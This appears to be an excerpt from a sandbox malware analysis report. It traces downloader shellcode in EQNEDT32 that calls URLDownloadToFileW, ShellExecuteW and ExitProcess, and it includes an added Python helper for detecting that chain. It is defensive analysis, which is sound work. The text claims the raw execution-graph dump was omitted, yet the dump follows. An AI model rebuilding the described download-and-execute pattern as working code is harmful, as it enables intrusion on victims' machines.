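The API lines of the block above already show the complete downloader pattern: LoadLibraryW, then URLDownloadToFileW whose URL argument (036D04BF) points back into the dumped region at 036D0000, then ShellExecuteW and ExitProcess, all executed from memory that is not backed by a PE image. The following Python is an added triage example, not Joe Sandbox code and not part of this report: it parses the "APIs" and "Memory Dump Source" lines of one function block (the sample input is a constructed copy of the lines above), orders the calls by call-site address, and flags a download, then launch, then exit chain coming from non-PE-backed memory. The set of launcher APIs beyond ShellExecuteW and the 0x1000 region size are assumptions, not values from the report.

```python
"""Triage helper for Joe Sandbox-style function blocks: parse the 'APIs' lines and the
'Memory Dump Source' line of a dumped code region and flag a download-and-execute
chain (URLDownloadToFile -> ShellExecute/WinExec/CreateProcess -> ExitProcess)
that runs from memory not backed by a PE image, i.e. injected shellcode."""
import re
from dataclasses import dataclass

# e.g. "URLDownloadToFileW.URLMON(00000000,036D04BF,?,00000000,00000000), ref: 036D0501"
API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# e.g. "Source File: ....sdmp, Offset: 036D0000, based on PE: false"
DUMP_LINE = re.compile(
    r"Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)", re.I
)

# Assumed set of process-launch APIs; the report itself only shows ShellExecuteW.
EXEC_APIS = {"ShellExecuteW", "ShellExecuteA", "WinExec", "CreateProcessW", "CreateProcessA"}


@dataclass(frozen=True)
class ApiRef:
    api: str
    module: str
    args: tuple
    ref: int  # call-site address


def parse_api_lines(text):
    """Return ApiRef records for every API line in text, sorted by call-site address."""
    refs = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if m:
            raw = m.group("args")
            args = tuple(a.strip() for a in raw.split(",")) if raw else ()
            refs.append(ApiRef(m.group("api"), m.group("module").upper(), args,
                               int(m.group("ref"), 16)))
    return sorted(refs, key=lambda r: r.ref)


def parse_dump_source(text):
    """Return (region_base, pe_backed) from the Memory Dump Source line, or None."""
    m = DUMP_LINE.search(text)
    if not m:
        return None
    return int(m.group("offset"), 16), m.group("pe").lower() == "true"


def find_download_execute_chain(refs):
    """Return (download, execute, exit) ApiRefs when a URLDownloadToFile call is followed,
    at increasing call-site addresses, by a process launch and then ExitProcess; else None."""
    download = next((r for r in refs if r.api.startswith("URLDownloadToFile")), None)
    if download is None:
        return None
    execute = next((r for r in refs if r.api in EXEC_APIS and r.ref > download.ref), None)
    if execute is None:
        return None
    exit_ = next((r for r in refs if r.api == "ExitProcess" and r.ref > execute.ref), None)
    return (download, execute, exit_) if exit_ else None


def url_pointer_in_region(download, base, size=0x1000):
    """True if szURL (second URLDownloadToFile argument) points into the dumped region,
    i.e. the download URL is a string embedded in the shellcode itself. The region size
    is not in the report; 0x1000 is an assumed upper bound for this dump."""
    try:
        url_ptr = int(download.args[1], 16)
    except (IndexError, ValueError):
        return False
    return base <= url_ptr < base + size


def triage(block_text):
    """Summarise one function block as a dict with the verdict and its evidence."""
    refs = parse_api_lines(block_text)
    dump = parse_dump_source(block_text)
    chain = find_download_execute_chain(refs)
    result = {"apis": [r.api for r in refs], "chain": chain is not None,
              "pe_backed": dump[1] if dump else None, "url_embedded": False,
              "verdict": "benign-or-unknown"}
    if chain and dump:
        result["url_embedded"] = url_pointer_in_region(chain[0], dump[0])
        result["verdict"] = ("downloader shellcode" if not dump[1]
                             else "downloader in PE-backed code")
    return result


# Constructed sample: the API and dump-source lines of one function block, copied from the report.
SAMPLE_BLOCK = """\
LoadLibraryW.KERNEL32(036D0486), ref: 036D0494
URLDownloadToFileW.URLMON(00000000,036D04BF,?,00000000,00000000), ref: 036D0501
ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036D053F
ExitProcess.KERNEL32(00000000), ref: 036D0557
Source File: 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
"""

# Constructed control: a block that only exits, with no download stage.
CONTROL_BLOCK = """\
ExitProcess.KERNEL32(00000000), ref: 036D0557
Source File: control.sdmp, Offset: 036D0000, based on PE: false
"""

if __name__ == "__main__":
    for name, block in (("sample", SAMPLE_BLOCK), ("control", CONTROL_BLOCK)):
        print(name, triage(block))
```

Run it over each function block of a dump. When the szURL argument resolves inside the dumped region, the download URL is a string in the same .sdmp file and can be read at that offset, which is the quickest way to recover the stage-two URL without re-detonating the sample.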

                                                        Control-flow Graph

                                                        Control-flow graph for 36d0408 (rendered graph not preserved): 36d0408 entry; 36d0409 call 36d05d2; 36d0410 call 36d0424; 36d0423-36d0432 call 36d044b; 36d0445-36d0466 call 36d047f; 36d0496-36d04a3 call 36d04ae; 36d04ba call 36d04ff; 36d04bf-36d0501 URLDownloadToFileW; 36d0503 call 36d0518; 36d0508-36d0525 call 36d052d; 36d0527-36d0547 ShellExecuteW, call 36d0552; 36d054d-36d0557 ExitProcess; 36d058c-36d05cf are exit blocks without API calls.
                                                        APIs
                                                        • URLDownloadToFileW.URLMON(00000000,036D04BF,?,00000000,00000000), ref: 036D0501
                                                        • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036D053F
                                                        • ExitProcess.KERNEL32(00000000), ref: 036D0557
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: DownloadExecuteExitFileProcessShell
                                                        • String ID:
                                                        • API String ID: 3584569557-0
                                                        • Opcode ID: f7f3f09e4148a3bcac6a411898d316dcc0832bfc0a92d7e063e1ffeba5016e13
                                                        • Instruction ID: c1835cc1fdfb5ee450f1a03320391720874fce8d02ab8ddd16d8f90c13ceeb69
                                                        • Opcode Fuzzy Hash: f7f3f09e4148a3bcac6a411898d316dcc0832bfc0a92d7e063e1ffeba5016e13
                                                        • Instruction Fuzzy Hash: 14418B96C4D3C1AFD713E7700E69B5ABF246F63100F5D8ACFD5C20A4A3E6989505C3AA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Control-flow graph for 36d0424 (rendered graph not preserved): 36d0424 entry; 36d0425 call 36d05d2; 36d042c call 36d044b; 36d0445-36d0492 call 36d047f; 36d0496-36d04a3 call 36d04ae; 36d04ba call 36d04ff; 36d04bf-36d0501 URLDownloadToFileW; 36d0503 call 36d0518; 36d0508-36d0525 call 36d052d; 36d0527-36d0547 ShellExecuteW, call 36d0552; 36d054d-36d0557 ExitProcess; 36d058c-36d05cf are exit blocks without API calls.
                                                        APIs
                                                        • URLDownloadToFileW.URLMON(00000000,036D04BF,?,00000000,00000000), ref: 036D0501
                                                        • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036D053F
                                                        • ExitProcess.KERNEL32(00000000), ref: 036D0557
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: DownloadExecuteExitFileProcessShell
                                                        • String ID:
                                                        • API String ID: 3584569557-0
                                                        • Opcode ID: b421113ee2b580f4539d1de1098c09857c27cb2c9508f3366d7d704861d6e192
                                                        • Instruction ID: 28ebc3f3bcbc28bf6397e901e095b9da1d034d1c2ffc51fc65dfbf8caefa7fb0
                                                        • Opcode Fuzzy Hash: b421113ee2b580f4539d1de1098c09857c27cb2c9508f3366d7d704861d6e192
                                                        • Instruction Fuzzy Hash: 7F419A96C4D3C16FD713E7300E6AB5ABF24AF63100F5D8ACFD4C20A4A3E6989505C3A6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Control-flow graph for 36d04ae (rendered graph not preserved): 36d04ae-36d0501 call 36d04ff, URLDownloadToFileW; 36d0503 call 36d0518; 36d0508-36d0525 call 36d052d; 36d0527-36d0547 ShellExecuteW, call 36d0552; 36d054d-36d0557 ExitProcess; 36d058c-36d05cf are exit blocks without API calls.
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: DownloadExecuteExitFileProcessShell
                                                        • String ID:
                                                        • API String ID: 3584569557-0
                                                        • Opcode ID: e20c9f7c018432f810d8a09bc23e677828e6e662158985473ac05502adb4075f
                                                        • Instruction ID: 7839351a1ebc7f651ed02ea22f310c8366f25d556d3bf961a40c0f78eb165a73
                                                        • Opcode Fuzzy Hash: e20c9f7c018432f810d8a09bc23e677828e6e662158985473ac05502adb4075f
                                                        • Instruction Fuzzy Hash: 9221F4E6C4C3C12EDB2397700D6EB65BF646F67600F9989CEE5C24A4E3E6984400C767
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Control-flow graph for 36d04ff (rendered graph not preserved): 36d04ff-36d0525 URLDownloadToFileW, call 36d0518, call 36d052d; 36d0527-36d0547 ShellExecuteW, call 36d0552; 36d054d-36d0557 ExitProcess; 36d058c-36d05cf are exit blocks without API calls.
                                                        APIs
                                                        • URLDownloadToFileW.URLMON(00000000,036D04BF,?,00000000,00000000), ref: 036D0501
                                                          • Part of subcall function 036D0518: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036D053F
                                                          • Part of subcall function 036D0518: ExitProcess.KERNEL32(00000000), ref: 036D0557
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: DownloadExecuteExitFileProcessShell
                                                        • String ID:
                                                        • API String ID: 3584569557-0
                                                        • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                        • Instruction ID: e3b8cb63ed92adcfbb7e3d66dd59f8ecf69bd8cb0474c5a41b9a9c4922d0e9d8
                                                        • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                        • Instruction Fuzzy Hash: 86F0A7E5D4C38429F622EB740E8EF6E6E55AF81700F54088DF9525D0D3D5949904872A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Control-flow graph for 36d052d (rendered graph not preserved): 36d052d-36d053f ShellExecuteW; 36d0541 call 36d0552; 36d0546-36d054b; 36d054d-36d0557 ExitProcess; 36d059b-36d05cf are exit blocks without API calls.
                                                        APIs
                                                        • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036D053F
                                                          • Part of subcall function 036D0552: ExitProcess.KERNEL32(00000000), ref: 036D0557
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: ExecuteExitProcessShell
                                                        • String ID:
                                                        • API String ID: 1124553745-0
                                                        • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                        • Instruction ID: ae8d959396642751d9700ed8eb4e0fbfe328c88a0187a6c8db441a2358a3b86d
                                                        • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                        • Instruction Fuzzy Hash: E4012DD9E5434221EB30E6684F46BFAAF55EF51700FCC845BBD91041C5D594A1C3CB2D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Control-flow graph for 36d0518 (rendered graph not preserved): 36d0518-36d051a entry; 36d051a call 36d052d; 36d051f-36d0525; 36d0527-36d0547 ShellExecuteW, call 36d0552; 36d054d-36d0557 ExitProcess; 36d058c-36d05cf are exit blocks without API calls.
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: ExecuteExitProcessShell
                                                        • String ID:
                                                        • API String ID: 1124553745-0
                                                        • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                        • Instruction ID: ef58a22b286a26baecf874dd26c0572e2df1f5ce5ba7a4bffacae0432c9729ec
                                                        • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                        • Instruction Fuzzy Hash: DC012DE4E4834131E771E6784F89FAEEE85EF81704F98845EFD9109182C2945583CB2D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Control-flow graph for 36d0552 (rendered graph not preserved): a single block, 36d0552-36d0557 ExitProcess.
                                                        APIs
                                                        • ExitProcess.KERNEL32(00000000), ref: 036D0557
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                        • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                        • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                        • Instruction Fuzzy Hash:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Control-flow graph for 36d0559 (rendered graph not preserved): 36d0559-36d0564 GetPEB; 36d0567-36d0578 call 36d0581; 36d057a-36d057e return.
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                        • Instruction ID: 69244eebd672be5baffc46ea101e24e3dc8dfb8fa6d0471e41b4dfe7c6b7f838
                                                        • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                        • Instruction Fuzzy Hash: F5D052B1612502CFC304EB04CA80E16F36AFFC8620F28C268E8004BB19C330EC92CB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Control-flow graph for 36d03ef (rendered graph not preserved): 36d03ef-36d0416 ExitProcess, call 36d0408, call 36d0424; 36d0423-36d0432 call 36d044b; 36d0445-36d0466 call 36d047f; 36d0496-36d04a3 call 36d04ae; 36d04ba call 36d04ff; 36d04bf-36d0501 URLDownloadToFileW; 36d0503 call 36d0518; 36d0508-36d0525 call 36d052d; 36d0527-36d0547 ShellExecuteW, call 36d0552; 36d054d-36d0557 ExitProcess; 36d058c-36d05cf are exit blocks without API calls.
                                                        APIs
                                                        • ExitProcess.KERNEL32(036D03DD), ref: 036D03EF
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: 012a95e31786f55606f2aae6733b7eafa3fe3ec4e00fc661099f0c1eee8d72ce
                                                        • Instruction ID: 5555957f96f1bc465c946948e81433601c1ede5411ded454f3204090e2f0d2d5
                                                        • Opcode Fuzzy Hash: 012a95e31786f55606f2aae6733b7eafa3fe3ec4e00fc661099f0c1eee8d72ce
                                                        • Instruction Fuzzy Hash: 7611D056C0E7C0DFC302E7705A6999AFF20BD63110F5C8ACFC4C44E1A3E6659A0AC3A6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage: 16.2%
                                                        Dynamic/Decrypted Code Coverage: 0%
                                                        Signature Coverage: 16.3%
                                                        Total number of Nodes: 1372
                                                        Total number of Limit Nodes: 22
                                                        [Execution graph: the rendered graph (nodes 3058-4183 and their edges) is not reproducible as text; the node and edge dump has been omitted. The API names attached to its nodes are listed below.]
                                                        • File and directory APIs: DeleteFileW, FindFirstFileW, FindNextFileW, FindClose, MoveFileExW, MoveFileW, CopyFileW, CreateFileW, ReadFile, WriteFile, SetFilePointer, GetFileSize, CloseHandle, GetFileAttributesW, SetFileAttributesW, SetFileSecurityW, SetFileTime, CompareFileTime, CreateDirectoryW, RemoveDirectoryW, SetCurrentDirectoryW, GetFullPathNameW, GetShortPathNameW, GetTempPathW, GetTempFileNameW, SHFileOperationW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHGetFileInfoW, GetPrivateProfileStringW
                                                        • Registry APIs: RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegCloseKey
                                                        • Process, privilege and system APIs: ExitProcess, ExitWindowsEx, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ShellExecuteExW, GetCommandLineW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleW, LoadLibraryExW, GetProcAddress, FreeLibrary, GetSystemDirectoryW, GetWindowsDirectoryW, SetEnvironmentVariableW, GetVersionExW, SetErrorMode, GetTickCount, Sleep, GetLastError, GlobalAlloc, GlobalFree, CoTaskMemFree, OleInitialize, OleUninitialize, IIDFromString, ordinal #17
                                                        • String APIs: lstrlenW, lstrlenA, lstrcatW, lstrcpynW, lstrcpyA, lstrcmpW, lstrcmpiW, lstrcmpiA, CharNextW, CharNextA, CharPrevW, wsprintfW, wsprintfA, MultiByteToWideChar, WideCharToMultiByte
                                                        • Window and GDI APIs: SendMessageW, SendMessageTimeoutW, FindWindowExW, ShowWindow, SetWindowTextW, SetDlgItemTextW, GetDlgItem, CheckDlgButton, EnableWindow, IsWindowVisible, IsWindowEnabled, SetWindowPos, GetWindowRect, GetClientRect, ScreenToClient, GetMessagePos, GetWindowLongW, SetWindowLongW, SetClassLongW, RegisterClassW, GetClassInfoW, CreateWindowExW, DestroyWindow, CreateDialogParamW, DialogBoxParamW, EndDialog, MessageBoxIndirectW, SetForegroundWindow, CallWindowProcW, DefWindowProcW, InvalidateRect, BeginPaint, EndPaint, FillRect, LoadImageW, LoadCursorW, SetCursor, GetSystemMenu, EnableMenuItem, SystemParametersInfoW, GetDC, ReleaseDC, GetDeviceCaps, MulDiv, GetSysColor, SetTextColor, SetBkMode, SetBkColor, CreateBrushIndirect, CreateFontIndirectW, DeleteObject
4182->4183 4184 406523 RegCreateKeyExW 4183->4184 4185 4024b6 4183->4185 4184->4185 4185->4168 4185->4169 4185->4171 4186 40290b 4187 402da6 17 API calls 4186->4187 4188 402912 FindFirstFileW 4187->4188 4189 40293a 4188->4189 4193 402925 4188->4193 4194 4065b5 wsprintfW 4189->4194 4191 402943 4195 40666e lstrcpynW 4191->4195 4194->4191 4195->4193 4196 40190c 4197 401943 4196->4197 4198 402da6 17 API calls 4197->4198 4199 401948 4198->4199 4200 405d7a 67 API calls 4199->4200 4201 401951 4200->4201 4202 40190f 4203 402da6 17 API calls 4202->4203 4204 401916 4203->4204 4205 405cce MessageBoxIndirectW 4204->4205 4206 40191f 4205->4206 4207 40580f 4208 405830 GetDlgItem GetDlgItem GetDlgItem 4207->4208 4209 4059b9 4207->4209 4252 4045ff SendMessageW 4208->4252 4211 4059c2 GetDlgItem CreateThread CloseHandle 4209->4211 4212 4059ea 4209->4212 4211->4212 4214 405a01 ShowWindow ShowWindow 4212->4214 4215 405a3a 4212->4215 4216 405a15 4212->4216 4213 4058a0 4218 4058a7 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4213->4218 4254 4045ff SendMessageW 4214->4254 4222 404631 8 API calls 4215->4222 4217 405a75 4216->4217 4220 405a29 4216->4220 4221 405a4f ShowWindow 4216->4221 4217->4215 4227 405a83 SendMessageW 4217->4227 4225 405915 4218->4225 4226 4058f9 SendMessageW SendMessageW 4218->4226 4228 4045a3 SendMessageW 4220->4228 4223 405a61 4221->4223 4224 405a6f 4221->4224 4229 405a48 4222->4229 4230 4056d0 24 API calls 4223->4230 4231 4045a3 SendMessageW 4224->4231 4232 405928 4225->4232 4233 40591a SendMessageW 4225->4233 4226->4225 4227->4229 4234 405a9c CreatePopupMenu 4227->4234 4228->4215 4230->4224 4231->4217 4236 4045ca 18 API calls 4232->4236 4233->4232 4235 4066ab 17 API calls 4234->4235 4237 405aac AppendMenuW 4235->4237 4238 405938 4236->4238 4239 405ac9 GetWindowRect 4237->4239 4240 405adc TrackPopupMenu 4237->4240 4241 405941 ShowWindow 4238->4241 4242 405975 GetDlgItem SendMessageW 4238->4242 4239->4240 4240->4229 4244 405af7 4240->4244 4245 405964 
4241->4245 4246 405957 ShowWindow 4241->4246 4242->4229 4243 40599c SendMessageW SendMessageW 4242->4243 4243->4229 4247 405b13 SendMessageW 4244->4247 4253 4045ff SendMessageW 4245->4253 4246->4245 4247->4247 4249 405b30 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4247->4249 4250 405b55 SendMessageW 4249->4250 4250->4250 4251 405b7e GlobalUnlock SetClipboardData CloseClipboard 4250->4251 4251->4229 4252->4213 4253->4242 4254->4216 4255 404e11 4256 404e21 4255->4256 4257 404e3d 4255->4257 4266 405cb2 GetDlgItemTextW 4256->4266 4259 404e70 4257->4259 4260 404e43 SHGetPathFromIDListW 4257->4260 4262 404e5a SendMessageW 4260->4262 4263 404e53 4260->4263 4261 404e2e SendMessageW 4261->4257 4262->4259 4265 40140b 2 API calls 4263->4265 4265->4262 4266->4261 4267 401491 4268 4056d0 24 API calls 4267->4268 4269 401498 4268->4269 4270 402891 4271 402898 4270->4271 4273 402ba9 4270->4273 4272 402d84 17 API calls 4271->4272 4274 40289f 4272->4274 4275 4028ae SetFilePointer 4274->4275 4275->4273 4276 4028be 4275->4276 4278 4065b5 wsprintfW 4276->4278 4278->4273 4279 401f12 4280 402da6 17 API calls 4279->4280 4281 401f18 4280->4281 4282 402da6 17 API calls 4281->4282 4283 401f21 4282->4283 4284 402da6 17 API calls 4283->4284 4285 401f2a 4284->4285 4286 402da6 17 API calls 4285->4286 4287 401f33 4286->4287 4288 401423 24 API calls 4287->4288 4289 401f3a 4288->4289 4296 405c94 ShellExecuteExW 4289->4296 4291 401f82 4292 406ae6 5 API calls 4291->4292 4294 40292e 4291->4294 4293 401f9f CloseHandle 4292->4293 4293->4294 4296->4291 4297 402f93 4298 402fa5 SetTimer 4297->4298 4299 402fbe 4297->4299 4298->4299 4300 40300c 4299->4300 4301 403012 MulDiv 4299->4301 4302 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4301->4302 4302->4300 4304 401d17 4305 402d84 17 API calls 4304->4305 4306 401d1d IsWindow 4305->4306 4307 401a20 4306->4307 4308 401b9b 4309 401ba8 4308->4309 4310 401bec 4308->4310 4313 401c31 4309->4313 4318 401bbf 4309->4318 4311 401bf1 4310->4311 4312 401c16 
GlobalAlloc 4310->4312 4323 40239d 4311->4323 4329 40666e lstrcpynW 4311->4329 4315 4066ab 17 API calls 4312->4315 4314 4066ab 17 API calls 4313->4314 4313->4323 4317 402397 4314->4317 4315->4313 4321 405cce MessageBoxIndirectW 4317->4321 4327 40666e lstrcpynW 4318->4327 4319 401c03 GlobalFree 4319->4323 4321->4323 4322 401bce 4328 40666e lstrcpynW 4322->4328 4325 401bdd 4330 40666e lstrcpynW 4325->4330 4327->4322 4328->4325 4329->4319 4330->4323 4331 40261c 4332 402da6 17 API calls 4331->4332 4333 402623 4332->4333 4336 40615e GetFileAttributesW CreateFileW 4333->4336 4335 40262f 4336->4335 4337 40149e 4338 4014ac PostQuitMessage 4337->4338 4339 40239d 4337->4339 4338->4339 4340 40259e 4350 402de6 4340->4350 4343 402d84 17 API calls 4344 4025b1 4343->4344 4345 4025d9 RegEnumValueW 4344->4345 4346 4025cd RegEnumKeyW 4344->4346 4348 40292e 4344->4348 4347 4025ee RegCloseKey 4345->4347 4346->4347 4347->4348 4351 402da6 17 API calls 4350->4351 4352 402dfd 4351->4352 4353 4064db RegOpenKeyExW 4352->4353 4354 4025a8 4353->4354 4354->4343 4355 4015a3 4356 402da6 17 API calls 4355->4356 4357 4015aa SetFileAttributesW 4356->4357 4358 4015bc 4357->4358 3288 401fa4 3289 402da6 17 API calls 3288->3289 3290 401faa 3289->3290 3291 4056d0 24 API calls 3290->3291 3292 401fb4 3291->3292 3303 405c51 CreateProcessW 3292->3303 3295 401fdd CloseHandle 3298 40292e 3295->3298 3299 401fcf 3300 401fd4 3299->3300 3301 401fdf 3299->3301 3311 4065b5 wsprintfW 3300->3311 3301->3295 3304 401fba 3303->3304 3305 405c84 CloseHandle 3303->3305 3304->3295 3304->3298 3306 406ae6 WaitForSingleObject 3304->3306 3305->3304 3307 406b00 3306->3307 3308 406b12 GetExitCodeProcess 3307->3308 3312 406a77 3307->3312 3308->3299 3311->3295 3313 406a94 PeekMessageW 3312->3313 3314 406aa4 WaitForSingleObject 3313->3314 3315 406a8a DispatchMessageW 3313->3315 3314->3307 3315->3313 4359 40202a 4360 402da6 17 API calls 4359->4360 4361 402031 4360->4361 4362 406a3b 5 API calls 4361->4362 4363 402040 4362->4363 4364 
4020cc 4363->4364 4365 40205c GlobalAlloc 4363->4365 4365->4364 4366 402070 4365->4366 4367 406a3b 5 API calls 4366->4367 4368 402077 4367->4368 4369 406a3b 5 API calls 4368->4369 4370 402081 4369->4370 4370->4364 4374 4065b5 wsprintfW 4370->4374 4372 4020ba 4375 4065b5 wsprintfW 4372->4375 4374->4372 4375->4364 4376 40252a 4377 402de6 17 API calls 4376->4377 4378 402534 4377->4378 4379 402da6 17 API calls 4378->4379 4380 40253d 4379->4380 4381 402548 RegQueryValueExW 4380->4381 4382 40292e 4380->4382 4383 402568 4381->4383 4386 40256e RegCloseKey 4381->4386 4383->4386 4387 4065b5 wsprintfW 4383->4387 4386->4382 4387->4386 4388 4021aa 4389 402da6 17 API calls 4388->4389 4390 4021b1 4389->4390 4391 402da6 17 API calls 4390->4391 4392 4021bb 4391->4392 4393 402da6 17 API calls 4392->4393 4394 4021c5 4393->4394 4395 402da6 17 API calls 4394->4395 4396 4021cf 4395->4396 4397 402da6 17 API calls 4396->4397 4398 4021d9 4397->4398 4399 402218 CoCreateInstance 4398->4399 4400 402da6 17 API calls 4398->4400 4403 402237 4399->4403 4400->4399 4401 401423 24 API calls 4402 4022f6 4401->4402 4403->4401 4403->4402 3700 403c2b 3701 403c46 3700->3701 3702 403c3c CloseHandle 3700->3702 3703 403c50 CloseHandle 3701->3703 3704 403c5a 3701->3704 3702->3701 3703->3704 3709 403c88 3704->3709 3707 405d7a 67 API calls 3708 403c6b 3707->3708 3710 403c96 3709->3710 3711 403c5f 3710->3711 3712 403c9b FreeLibrary GlobalFree 3710->3712 3711->3707 3712->3711 3712->3712 4404 401a30 4405 402da6 17 API calls 4404->4405 4406 401a39 ExpandEnvironmentStringsW 4405->4406 4407 401a4d 4406->4407 4409 401a60 4406->4409 4408 401a52 lstrcmpW 4407->4408 4407->4409 4408->4409 4415 4023b2 4416 4023c0 4415->4416 4417 4023ba 4415->4417 4419 4023ce 4416->4419 4420 402da6 17 API calls 4416->4420 4418 402da6 17 API calls 4417->4418 4418->4416 4421 4023dc 4419->4421 4423 402da6 17 API calls 4419->4423 4420->4419 4422 402da6 17 API calls 4421->4422 4424 4023e5 WritePrivateProfileStringW 4422->4424 4423->4421 4425 
